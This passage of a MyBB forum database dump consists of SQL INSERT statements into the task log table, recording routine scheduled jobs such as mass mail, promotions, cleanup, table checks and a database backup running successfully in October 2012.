(`lid`, `tid`, `dateline`, `data`) VALUES ('13354', '5', '1351445115', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13355', '9', '1351445226', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13356', '3', '1351445432', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13357', '9', '1351446578', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13358', '5', '1351446583', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13359', '9', '1351447319', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13360', '3', '1351449924', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13361', '1', '1351449927', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13362', '7', '1351449957', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13363', '5', '1351449966', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13364', '9', '1351450307', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13365', '9', '1351452756', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13366', '3', '1351453649', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13367', '1', '1351453665', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13368', '7', '1351453667', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13369', '5', '1351453710', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13370', '9', '1351453756', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13371', '9', '1351454437', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13372', '3', '1351454444', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13373', '1', '1351454516', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13374', '7', '1351454522', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13375', '5', '1351455098', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13376', '9', '1351455108', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13377', '5', '1351456032', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13378', '9', '1351456039', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13379', '3', '1351456828', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13380', '9', '1351456852', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13381', '5', '1351457629', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13382', '9', '1351457734', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13383', '3', '1351458371', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13384', '1', '1351458401', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13385', '7', '1351458404', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13386', '5', '1351458745', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13387', '9', '1351458749', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13388', '5', '1351459509', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13389', '9', '1351459623', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13390', '3', '1351459812', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13391', '9', '1351460654', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13392', '5', '1351460710', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13393', '9', '1351462389', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13394', '3', '1351462476', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13395', '1', '1351462522', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13396', '7', '1351462526', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13397', '5', '1351462532', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13398', '5', '1351463143', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13399', '9', '1351463431', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13400', '3', '1351463515', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13401', '9', '1351464463', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13402', '5', '1351464548', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13403', '9', '1351465101', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13404', '3', '1351465144', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13405', '1', '1351465203', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13406', '7', '1351465206', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13407', '5', '1351465768', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13408', '9', '1351466028', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13409', '5', '1351466781', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13410', '9', '1351466798', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13411', '3', '1351467540', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13412', '9', '1351469039', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13413', '5', '1351469167', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13414', '3', '1351469178', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13415', '1', '1351469181', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13416', '2', '1351469302', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13417', '7', '1351469319', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13418', '11', '1351469338', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13419', '9', '1351469510', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13420', '5', '1351471829', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13421', '9', '1351471853', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13422', '3', '1351471857', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13423', '9', '1351473311', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13424', '3', '1351473322', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13425', '1', '1351473328', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13426', '7', '1351473619', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13427', '5', '1351474155', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13428', '9', '1351474192', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13429', '3', '1351475514', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13430', '9', '1351476008', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13431', '5', '1351476012', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13432', '3', '1351476069', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13433', '1', '1351476070', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13434', '7', '1351476074', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13435', '5', '1351476489', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13436', '9', '1351476690', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13437', '5', '1351478334', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13438', '9', '1351478739', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13439', '3', '1351478744', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13440', '5', '1351478806', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13441', '9', '1351479429', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13442', '3', '1351480259', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13443', '1', '1351480265', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13444', '7', '1351480269', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13445', '5', '1351480280', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13446', '9', '1351480283', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13447', '5', '1351481548', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13448', '9', '1351481719', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13449', '3', '1351481722', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13450', '9', '1351482184', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13451', '5', '1351482387', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13452', '9', '1351483396', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13453', '3', '1351483401', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13454', '1', '1351483659', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13455', '7', '1351483665', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13456', '5', '1351483667', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13457', '9', '1351484281', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13458', '5', '1351484818', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13459', '9', '1351484828', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13460', '3', '1351486152', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13461', '9', '1351489499', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13462', '5', '1351489504', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13463', '3', '1351489541', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13464', '1', '1351489673', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13465', '7', '1351489693', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13466', '9', '1351491169', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13467', '3', '1351491175', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13468', '1', '1351492767', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13469', '7', '1351492789', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13470', '5', '1351495352', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13471', '9', '1351495444', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13472', '3', '1351495458', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13473', '1', '1351501058', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13474', '7', '1351501064', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13475', '5', '1351501108', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13476', '9', '1351501148', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13477', '3', '1351502254', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13478', '1', '1351502275', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13479', '7', '1351502280', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13480', '5', '1351502314', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13481', '9', '1351502331', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13482', '5', '1351503022', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13483', '9', '1351504806', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13484', '3', '1351504812', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13485', '5', '1351506023', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13486', '1', '1351506089', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13487', '7', '1351506101', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13488', '9', '1351506253', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13489', '5', '1351506400', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13490', '9', '1351506433', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13491', '3', '1351506644', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13492', '9', '1351508005', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13493', '5', '1351508076', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13494', '9', '1351508131', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13495', '3', '1351508564', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13496', '1', '1351509128', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13497', '7', '1351509204', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13498', '5', '1351510764', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13499', '9', '1351512431', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13500', '3', '1351512496', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13501', '5', '1351512605', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13502', '1', '1351515922', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13503', '4', '1351522066', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13504', '7', '1351524347', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13505', '9', '1351524476', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13506', '5', '1351524492', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13507', '3', '1351524495', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13508', '1', '1351524506', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13509', '3', '1351524779', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13510', '9', '1351525319', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13511', '5', '1351526074', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13512', '9', '1351526186', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13513', '3', '1351526425', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13514', '1', '1351526445', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13515', '7', '1351526455', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13516', '5', '1351526721', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13517', '9', '1351527006', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13518', '5', '1351527946', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13519', '9', '1351528101', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13520', '3', '1351528251', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13521', '9', '1351528999', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13522', '5', '1351529112', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13523', '9', '1351529763', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13524', '3', '1351529969', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13525', '1', '1351530054', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13526', '7', '1351530096', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13527', '5', '1351530307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13528', '9', '1351530626', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13529', '5', '1351531598', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13530', '9', '1351531623', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13531', '3', '1351531874', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13532', '9', '1351532534', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13533', '5', '1351532717', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13534', '9', '1351533341', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13535', '3', '1351533581', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13536', '1', '1351533625', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13537', '7', '1351533637', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13538', '5', '1351533946', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13539', '9', '1351534244', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13540', '5', '1351535151', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13541', '9', '1351535578', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13542', '3', '1351535601', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13543', '9', '1351536025', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13544', '5', '1351536387', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13545', '9', '1351536911', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13546', '3', '1351537144', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13547', '1', '1351537212', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13548', '7', '1351537218', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13549', '5', '1351537521', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13550', '9', '1351537821', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13551', '5', '1351538708', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13552', '9', '1351538731', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13553', '3', '1351539127', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13554', '9', '1351539650', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13555', '5', '1351540100', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13556', '9', '1351540654', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13557', '3', '1351540781', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13558', '1', '1351540807', 'The hourly cleanup task successfully ran.'); INSERT INTO 